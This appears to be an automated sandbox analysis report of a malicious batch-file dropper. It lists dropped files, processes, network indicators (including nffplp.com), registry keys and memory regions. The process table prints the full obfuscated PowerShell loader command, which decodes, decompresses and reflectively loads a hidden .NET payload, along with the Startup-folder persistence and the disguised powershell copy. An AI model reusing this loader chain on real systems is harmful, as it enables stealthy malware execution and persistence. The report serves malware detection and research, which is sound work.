Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
87M9Y3P4Z7.bat
|
Unicode text, UTF-8 text, with very long lines (56494), with CRLF, CR, LF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktqy3wn.ooi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41utsmme.lr0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iugmfo5g.xfc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjg1ezd5.dmv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\ChannelUris.bat
|
Unicode text, UTF-8 text, with very long lines (56494), with CRLF, CR, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\ChannelUris.bat:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo F "
|
||
C:\Windows\System32\xcopy.exe
|
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
|
||
C:\Windows\System32\attrib.exe
|
attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
|
||
C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
|
C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat'
| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream(
, $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz,
([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]]
$Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq
= $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod,
$null, $null, $null)| Out-Null"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo F "
|
||
C:\Windows\System32\xcopy.exe
|
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
|
||
C:\Windows\System32\attrib.exe
|
attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
|
||
C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
|
C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat'
| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream(
, $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz,
([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]]
$Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq
= $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod,
$null, $null, $null)| Out-Null"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
There are 7 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
|
unknown
|
||
http://nffplp.com
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
https://account.dyn.com/
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
http://crt.sectigo.com/cPan/
|
unknown
|
||
http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
|
unknown
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
http://crl.micro
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 16 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ip-api.com
|
208.95.112.1
|
||
nffplp.com
|
163.44.198.71
|
||
s-part-0017.t-0009.t-msedge.net
|
13.107.246.45
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.95.112.1
|
ip-api.com
|
United States
|
||
163.44.198.71
|
nffplp.com
|
Singapore
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
382000
|
remote allocation
|
page execute and read and write
|
||
5095000
|
trusted library allocation
|
page read and write
|
||
8820000
|
trusted library section
|
page read and write
|
||
276E000
|
trusted library allocation
|
page read and write
|
||
6E93000
|
trusted library allocation
|
page read and write
|
||
2872000
|
trusted library allocation
|
page read and write
|
||
6052000
|
trusted library allocation
|
page read and write
|
||
4BCC000
|
trusted library allocation
|
page read and write
|
||
6783000
|
trusted library allocation
|
page read and write
|
||
680D000
|
trusted library allocation
|
page read and write
|
||
2791000
|
trusted library allocation
|
page read and write
|
||
5783000
|
trusted library allocation
|
page read and write
|
||
284F000
|
trusted library allocation
|
page read and write
|
||
2741000
|
trusted library allocation
|
page read and write
|
||
52F9000
|
trusted library allocation
|
page read and write
|
||
2823000
|
trusted library allocation
|
page read and write
|
||
708E000
|
stack
|
page read and write
|
||
4C9E000
|
trusted library allocation
|
page read and write
|
||
53E6000
|
trusted library allocation
|
page read and write
|
||
55EB000
|
trusted library allocation
|
page read and write
|
||
55C1000
|
trusted library allocation
|
page read and write
|
||
4D83000
|
trusted library allocation
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
559C000
|
trusted library allocation
|
page read and write
|
||
4A52000
|
trusted library allocation
|
page read and write
|
||
4DC6000
|
trusted library allocation
|
page read and write
|
||
858D000
|
stack
|
page read and write
|
||
55A8000
|
trusted library allocation
|
page read and write
|
||
4FB4000
|
trusted library allocation
|
page read and write
|
||
556E000
|
trusted library allocation
|
page read and write
|
||
1C7977BC000
|
heap
|
page read and write
|
||
6170000
|
heap
|
page read and write
|
||
4EB9000
|
trusted library allocation
|
page read and write
|
||
7D3A000
|
trusted library allocation
|
page read and write
|
||
5D60000
|
trusted library allocation
|
page read and write
|
||
5908000
|
trusted library allocation
|
page read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
4B5B000
|
trusted library allocation
|
page read and write
|
||
4D23000
|
trusted library allocation
|
page read and write
|
||
84D6000
|
stack
|
page read and write
|
||
629E000
|
stack
|
page read and write
|
||
28A0000
|
heap
|
page execute and read and write
|
||
4F8E000
|
trusted library allocation
|
page read and write
|
||
4B41000
|
heap
|
page read and write
|
||
4BB0000
|
heap
|
page read and write
|
||
1C9000
|
stack
|
page read and write
|
||
58E5000
|
trusted library allocation
|
page read and write
|
||
5139000
|
trusted library allocation
|
page read and write
|
||
54D8000
|
trusted library allocation
|
page read and write
|
||
6E30000
|
trusted library allocation
|
page read and write
|
||
8E71000
|
trusted library allocation
|
page read and write
|
||
5EC0000
|
trusted library allocation
|
page read and write
|
||
5395000
|
trusted library allocation
|
page read and write
|
||
4D4D000
|
trusted library allocation
|
page read and write
|
||
5894000
|
trusted library allocation
|
page read and write
|
||
58BE000
|
trusted library allocation
|
page read and write
|
||
545D000
|
trusted library allocation
|
page read and write
|
||
8B00000
|
trusted library allocation
|
page read and write
|
||
27AA000
|
trusted library allocation
|
page read and write
|
||
4CEE000
|
stack
|
page read and write
|
||
4E78000
|
trusted library allocation
|
page read and write
|
||
7AE0000
|
trusted library allocation
|
page read and write
|
||
5300000
|
heap
|
page read and write
|
||
5647000
|
trusted library allocation
|
page read and write
|
||
4E68000
|
trusted library allocation
|
page read and write
|
||
619E000
|
unkown
|
page read and write
|
||
4A20000
|
trusted library allocation
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
4E08000
|
trusted library allocation
|
page read and write
|
||
54A6000
|
trusted library allocation
|
page read and write
|
||
72FD000
|
stack
|
page read and write
|
||
1B79F890000
|
heap
|
page read and write
|
||
8AB0000
|
trusted library allocation
|
page read and write
|
||
4E7A000
|
trusted library allocation
|
page read and write
|
||
5833000
|
trusted library allocation
|
page read and write
|
||
2A02000
|
heap
|
page read and write
|
||
58C4000
|
trusted library allocation
|
page read and write
|
||
2640000
|
heap
|
page read and write
|
||
3051000
|
heap
|
page read and write
|
||
2782000
|
trusted library allocation
|
page read and write
|
||
588E000
|
trusted library allocation
|
page read and write
|
||
5666000
|
trusted library allocation
|
page read and write
|
||
8B0C000
|
trusted library allocation
|
page read and write
|
||
5478000
|
trusted library allocation
|
page read and write
|
||
5461000
|
trusted library allocation
|
page read and write
|
||
5816000
|
trusted library allocation
|
page read and write
|
||
5664000
|
trusted library allocation
|
page read and write
|
||
63AF000
|
stack
|
page read and write
|
||
284D000
|
trusted library allocation
|
page read and write
|
||
4A23000
|
trusted library allocation
|
page execute and read and write
|
||
4CA6000
|
trusted library allocation
|
page read and write
|
||
5527000
|
trusted library allocation
|
page read and write
|
||
88E0000
|
trusted library allocation
|
page read and write
|
||
4D51000
|
trusted library allocation
|
page read and write
|
||
4ED1000
|
trusted library allocation
|
page read and write
|
||
30D7000
|
heap
|
page read and write
|
||
6B4E000
|
stack
|
page read and write
|
||
5401000
|
trusted library allocation
|
page read and write
|
||
5523000
|
trusted library allocation
|
page read and write
|
||
C9E000
|
stack
|
page read and write
|
||
5D7D000
|
trusted library allocation
|
page read and write
|
||
8A90000
|
trusted library allocation
|
page read and write
|
||
5806000
|
trusted library allocation
|
page read and write
|
||
25FE000
|
stack
|
page read and write
|
||
4F11000
|
trusted library allocation
|
page read and write
|
||
5F30000
|
trusted library allocation
|
page read and write
|
||
280A000
|
trusted library allocation
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
53AE000
|
trusted library allocation
|
page read and write
|
||
7A70000
|
heap
|
page read and write
|
||
6D5A000
|
heap
|
page read and write
|
||
4A30000
|
trusted library allocation
|
page read and write
|
||
4A10000
|
trusted library allocation
|
page read and write
|
||
1CD000
|
stack
|
page read and write
|
||
4320000
|
heap
|
page execute and read and write
|
||
4E04000
|
trusted library allocation
|
page read and write
|
||
4EEB000
|
trusted library allocation
|
page read and write
|
||
4F8C000
|
trusted library allocation
|
page read and write
|
||
6C22000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
5122000
|
trusted library allocation
|
page read and write
|
||
4A42000
|
trusted library allocation
|
page read and write
|
||
4EAF000
|
trusted library allocation
|
page read and write
|
||
5DBE000
|
stack
|
page read and write
|
||
4B71000
|
trusted library allocation
|
page read and write
|
||
275B000
|
trusted library allocation
|
page read and write
|
||
55F1000
|
trusted library allocation
|
page read and write
|
||
75CE000
|
stack
|
page read and write
|
||
4EA5000
|
trusted library allocation
|
page read and write
|
||
5122000
|
trusted library allocation
|
page read and write
|
||
56B0000
|
trusted library allocation
|
page read and write
|
||
5581000
|
trusted library allocation
|
page read and write
|
||
DE4000
|
trusted library allocation
|
page read and write
|
||
562A000
|
trusted library allocation
|
page read and write
|
||
539B000
|
trusted library allocation
|
page read and write
|
||
3779000
|
trusted library allocation
|
page read and write
|
||
4F82000
|
trusted library allocation
|
page read and write
|
||
874000
|
trusted library allocation
|
page read and write
|
||
4F3F000
|
trusted library allocation
|
page read and write
|
||
8652000
|
trusted library allocation
|
page read and write
|
||
7F490000
|
trusted library allocation
|
page execute and read and write
|
||
96E000
|
heap
|
page read and write
|
||
42CE000
|
stack
|
page read and write
|
||
50FF000
|
trusted library allocation
|
page read and write
|
||
4A55000
|
trusted library allocation
|
page execute and read and write
|
||
738E000
|
stack
|
page read and write
|
||
53F9000
|
trusted library allocation
|
page read and write
|
||
4F1C000
|
trusted library allocation
|
page read and write
|
||
2963000
|
heap
|
page read and write
|
||
59B8000
|
heap
|
page read and write
|
||
4F88000
|
trusted library allocation
|
page read and write
|
||
6DCA000
|
heap
|
page read and write
|
||
3044000
|
heap
|
page read and write
|
||
5615000
|
trusted library allocation
|
page read and write
|
||
79BE000
|
stack
|
page read and write
|
||
51B6000
|
trusted library allocation
|
page read and write
|
||
250D000
|
trusted library allocation
|
page execute and read and write
|
||
581C000
|
trusted library allocation
|
page read and write
|
||
AD3000
|
heap
|
page read and write
|
||
251D000
|
trusted library allocation
|
page execute and read and write
|
||
AE0000
|
trusted library allocation
|
page execute and read and write
|
||
7682000
|
heap
|
page read and write
|
||
4DA0000
|
trusted library allocation
|
page read and write
|
||
4B62000
|
trusted library allocation
|
page read and write
|
||
4FCB000
|
heap
|
page read and write
|
||
8AFB000
|
trusted library allocation
|
page read and write
|
||
564D000
|
trusted library allocation
|
page read and write
|
||
2756000
|
trusted library allocation
|
page read and write
|
||
A7B000
|
trusted library allocation
|
page execute and read and write
|
||
274D000
|
stack
|
page read and write
|
||
4B5E000
|
trusted library allocation
|
page read and write
|
||
2510000
|
trusted library allocation
|
page read and write
|
||
868E000
|
trusted library allocation
|
page read and write
|
||
5427000
|
trusted library allocation
|
page read and write
|
||
27A4000
|
trusted library allocation
|
page read and write
|
||
4E77000
|
trusted library allocation
|
page read and write
|
||
4EF0000
|
trusted library allocation
|
page read and write
|
||
4DC2000
|
trusted library allocation
|
page read and write
|
||
5831000
|
trusted library allocation
|
page read and write
|
||
8C86000
|
heap
|
page read and write
|
||
4F73000
|
trusted library allocation
|
page read and write
|
||
5688000
|
trusted library allocation
|
page read and write
|
||
4CF7000
|
trusted library allocation
|
page read and write
|
||
8100000
|
trusted library allocation
|
page read and write
|
||
3CC0679000
|
stack
|
page read and write
|
||
4DB7000
|
trusted library allocation
|
page read and write
|
||
543E000
|
trusted library allocation
|
page read and write
|
||
873000
|
trusted library allocation
|
page execute and read and write
|
||
4F4C000
|
trusted library allocation
|
page read and write
|
||
8874000
|
heap
|
page read and write
|
||
1FEEE410000
|
heap
|
page read and write
|
||
49F6000
|
trusted library allocation
|
page read and write
|
||
72BA000
|
stack
|
page read and write
|
||
B00000
|
trusted library allocation
|
page read and write
|
||
8CD000
|
trusted library allocation
|
page execute and read and write
|
||
4C51000
|
trusted library allocation
|
page read and write
|
||
4C9C000
|
trusted library allocation
|
page read and write
|
||
276E000
|
trusted library allocation
|
page read and write
|
||
5120000
|
trusted library allocation
|
page read and write
|
||
4F41000
|
trusted library allocation
|
page read and write
|
||
514E000
|
trusted library allocation
|
page read and write
|
||
6F9000
|
stack
|
page read and write
|
||
E17000
|
heap
|
page read and write
|
||
4E94000
|
trusted library allocation
|
page read and write
|
||
723E000
|
stack
|
page read and write
|
||
4E4A000
|
heap
|
page read and write
|
||
C50000
|
trusted library allocation
|
page read and write
|
||
37F1000
|
trusted library allocation
|
page read and write
|
||
5464000
|
trusted library allocation
|
page read and write
|
||
293B000
|
heap
|
page read and write
|
||
24E0000
|
trusted library section
|
page read and write
|
||
54DC000
|
trusted library allocation
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
A6A000
|
trusted library allocation
|
page execute and read and write
|
||
2700000
|
heap
|
page read and write
|
||
278D000
|
trusted library allocation
|
page read and write
|
||
632E000
|
stack
|
page read and write
|
||
4FD1000
|
trusted library allocation
|
page read and write
|
||
4B7D000
|
trusted library allocation
|
page read and write
|
||
616E000
|
stack
|
page read and write
|
||
80A0000
|
trusted library allocation
|
page read and write
|
||
733B000
|
stack
|
page read and write
|
||
8210000
|
trusted library allocation
|
page execute and read and write
|
||
8870000
|
heap
|
page read and write
|
||
8AA0000
|
trusted library allocation
|
page read and write
|
||
FD2F8FE000
|
stack
|
page read and write
|
||
430F000
|
stack
|
page read and write
|
||
5510000
|
trusted library allocation
|
page read and write
|
||
51B0000
|
trusted library allocation
|
page read and write
|
||
8CC0000
|
heap
|
page read and write
|
||
A10000
|
trusted library allocation
|
page read and write
|
||
545F000
|
trusted library allocation
|
page read and write
|
||
5197000
|
trusted library allocation
|
page read and write
|
||
5536000
|
trusted library allocation
|
page read and write
|
||
54F5000
|
trusted library allocation
|
page read and write
|
||
DC0000
|
heap
|
page read and write
|
||
248000
|
unkown
|
page execute read
|
||
2E6C000
|
stack
|
page read and write
|
||
1FEEE1A0000
|
heap
|
page read and write
|
||
1FEEE120000
|
heap
|
page read and write
|
||
717D000
|
stack
|
page read and write
|
||
4E30000
|
trusted library allocation
|
page read and write
|
||
652E000
|
stack
|
page read and write
|
||
3CC077F000
|
stack
|
page read and write
|
||
53AA000
|
trusted library allocation
|
page read and write
|
||
4EBB000
|
trusted library allocation
|
page read and write
|
||
8C30000
|
trusted library allocation
|
page execute and read and write
|
||
58A9000
|
trusted library allocation
|
page read and write
|
||
8C1000
|
heap
|
page read and write
|
||
5CBE000
|
stack
|
page read and write
|
||
6D7A000
|
trusted library allocation
|
page read and write
|
||
9E2000
|
trusted library allocation
|
page read and write
|
||
5589000
|
trusted library allocation
|
page read and write
|
||
559E000
|
trusted library allocation
|
page read and write
|
||
50DC000
|
stack
|
page read and write
|
||
482E000
|
stack
|
page read and write
|
||
4F6F000
|
trusted library allocation
|
page read and write
|
||
4CFA000
|
trusted library allocation
|
page read and write
|
||
2570000
|
heap
|
page read and write
|
||
5493000
|
trusted library allocation
|
page read and write
|
||
5442000
|
trusted library allocation
|
page read and write
|
||
276C000
|
trusted library allocation
|
page read and write
|
||
58C9000
|
trusted library allocation
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
545B000
|
trusted library allocation
|
page read and write
|
||
5FB0000
|
trusted library allocation
|
page read and write
|
||
7B50000
|
heap
|
page read and write
|
||
55DC000
|
trusted library allocation
|
page read and write
|
||
4F5A000
|
trusted library allocation
|
page read and write
|
||
9820000
|
trusted library allocation
|
page execute and read and write
|
||
547A000
|
trusted library allocation
|
page read and write
|
||
4B82000
|
trusted library allocation
|
page read and write
|
||
513B000
|
trusted library allocation
|
page read and write
|
||
55DA000
|
trusted library allocation
|
page read and write
|
||
5544000
|
trusted library allocation
|
page read and write
|
||
1B79FAB5000
|
heap
|
page read and write
|
||
4CD8000
|
trusted library allocation
|
page read and write
|
||
589B000
|
trusted library allocation
|
page read and write
|
||
58A1000
|
trusted library allocation
|
page read and write
|
||
4D68000
|
trusted library allocation
|
page read and write
|
||
6730000
|
heap
|
page read and write
|
||
7F90000
|
trusted library allocation
|
page execute and read and write
|
||
548F000
|
trusted library allocation
|
page read and write
|
||
7AB0000
|
trusted library allocation
|
page read and write
|
||
289E000
|
stack
|
page read and write
|
||
6797000
|
trusted library allocation
|
page read and write
|
||
54BD000
|
trusted library allocation
|
page read and write
|
||
7FBB0000
|
trusted library allocation
|
page execute and read and write
|
||
51A6000
|
trusted library allocation
|
page read and write
|
||
5496000
|
trusted library allocation
|
page read and write
|
||
4C5E000
|
trusted library allocation
|
page read and write
|
||
4D1F000
|
trusted library allocation
|
page read and write
|
||
1FEEE150000
|
heap
|
page read and write
|
||
4F6E000
|
stack
|
page read and write
|
||
2530000
|
trusted library allocation
|
page read and write
|
||
4D0C000
|
trusted library allocation
|
page read and write
|
||
30B1000
|
heap
|
page read and write
|
||
5414000
|
trusted library allocation
|
page read and write
|
||
C5E000
|
stack
|
page read and write
|
||
3240000
|
trusted library section
|
page read and write
|
||
BA8000
|
trusted library allocation
|
page read and write
|
||
69A0000
|
heap
|
page read and write
|
||
55A4000
|
trusted library allocation
|
page read and write
|
||
592E000
|
heap
|
page read and write
|
||
82E000
|
stack
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
22183FE0000
|
heap
|
page read and write
|
||
582F000
|
trusted library allocation
|
page read and write
|
||
5814000
|
trusted library allocation
|
page read and write
|
||
5F60000
|
trusted library allocation
|
page execute and read and write
|
||
5F34000
|
trusted library allocation
|
page read and write
|
||
5105000
|
trusted library allocation
|
page read and write
|
||
54DE000
|
trusted library allocation
|
page read and write
|
||
58AF000
|
trusted library allocation
|
page read and write
|
||
548B000
|
trusted library allocation
|
page read and write
|
||
6D10000
|
heap
|
page read and write
|
||
48A1000
|
trusted library allocation
|
page read and write
|
||
3DE000
|
stack
|
page read and write
|
||
4DE1000
|
trusted library allocation
|
page read and write
|
||
5440000
|
trusted library allocation
|
page read and write
|
||
251000
|
unkown
|
page write copy
|
||
252000
|
unkown
|
page readonly
|
||
4890000
|
heap
|
page read and write
|
||
55D4000
|
trusted library allocation
|
page read and write
|
||
8C0000
|
trusted library allocation
|
page read and write
|
||
4E0C000
|
trusted library allocation
|
page read and write
|
||
704E000
|
stack
|
page read and write
|
||
4A46000
|
trusted library allocation
|
page execute and read and write
|
||
7D40000
|
trusted library section
|
page read and write
|
||
4F33000
|
trusted library allocation
|
page read and write
|
||
AA0000
|
heap
|
page read and write
|
||
4F70000
|
heap
|
page execute and read and write
|
||
34D000
|
stack
|
page read and write
|
||
7E70000
|
heap
|
page read and write
|
||
6CBD000
|
trusted library allocation
|
page read and write
|
||
518D000
|
trusted library allocation
|
page read and write
|
||
D28000
|
trusted library allocation
|
page read and write
|
||
5DFE000
|
stack
|
page read and write
|
||
2218404B000
|
heap
|
page read and write
|
||
4DE7000
|
trusted library allocation
|
page read and write
|
||
4E0A000
|
trusted library allocation
|
page read and write
|
||
4D85000
|
trusted library allocation
|
page read and write
|
||
4DEA000
|
heap
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page read and write
|
||
4AFE000
|
stack
|
page read and write
|
||
4DFA000
|
trusted library allocation
|
page read and write
|
||
34A000
|
stack
|
page read and write
|
||
4A3D000
|
trusted library allocation
|
page execute and read and write
|
||
8160000
|
trusted library allocation
|
page execute and read and write
|
||
1E13D86C000
|
heap
|
page read and write
|
||
4E21000
|
trusted library allocation
|
page read and write
|
||
93B8000
|
heap
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
D7E000
|
stack
|
page read and write
|
||
4D57000
|
trusted library allocation
|
page read and write
|
||
7AA0000
|
trusted library allocation
|
page read and write
|
||
53E9000
|
trusted library allocation
|
page read and write
|
||
5617000
|
trusted library allocation
|
page read and write
|
||
5698000
|
trusted library allocation
|
page read and write
|
||
5489000
|
trusted library allocation
|
page read and write
|
||
4DBB000
|
trusted library allocation
|
page read and write
|
||
5696000
|
trusted library allocation
|
page read and write
|
||
4CC1000
|
trusted library allocation
|
page read and write
|
||
555E000
|
trusted library allocation
|
page read and write
|
||
88C0000
|
trusted library allocation
|
page execute and read and write
|
||
586F000
|
trusted library allocation
|
page read and write
|
||
4E75000
|
trusted library allocation
|
page read and write
|
||
5161000
|
trusted library allocation
|
page read and write
|
||
4E9C000
|
trusted library allocation
|
page read and write
|
||
764F000
|
stack
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
691E000
|
stack
|
page read and write
|
||
85E0000
|
trusted library allocation
|
page execute and read and write
|
||
2A28000
|
heap
|
page read and write
|
||
635E000
|
stack
|
page read and write
|
||
8500000
|
trusted library allocation
|
page read and write
|
||
4CAA000
|
trusted library allocation
|
page read and write
|
||
5487000
|
trusted library allocation
|
page read and write
|
||
8630000
|
trusted library allocation
|
page read and write
|
||
5444000
|
trusted library allocation
|
page read and write
|
||
7E80000
|
heap
|
page read and write
|
||
4F80000
|
trusted library allocation
|
page read and write
|
||
5FD1000
|
trusted library allocation
|
page read and write
|
||
550E000
|
trusted library allocation
|
page read and write
|
||
291E000
|
stack
|
page read and write
|
||
4CC5000
|
trusted library allocation
|
page read and write
|
||
5DDE000
|
stack
|
page read and write
|
||
4CFC000
|
stack
|
page read and write
|
||
6E80000
|
trusted library allocation
|
page read and write
|
||
559A000
|
trusted library allocation
|
page read and write
|
||
552B000
|
trusted library allocation
|
page read and write
|
||
557F000
|
trusted library allocation
|
page read and write
|
||
5628000
|
trusted library allocation
|
page read and write
|
||
8B2C000
|
trusted library allocation
|
page read and write
|
||
261E000
|
stack
|
page read and write
|
||
4F46000
|
trusted library allocation
|
page read and write
|
||
4EDF000
|
trusted library allocation
|
page read and write
|
||
4C70000
|
trusted library allocation
|
page read and write
|
||
981000
|
heap
|
page read and write
|
||
5118000
|
trusted library allocation
|
page read and write
|
||
54A4000
|
trusted library allocation
|
page read and write
|
||
88E000
|
stack
|
page read and write
|
||
8ABD000
|
trusted library allocation
|
page read and write
|
||
5EFD000
|
stack
|
page read and write
|
||
5107000
|
trusted library allocation
|
page read and write
|
||
93E9000
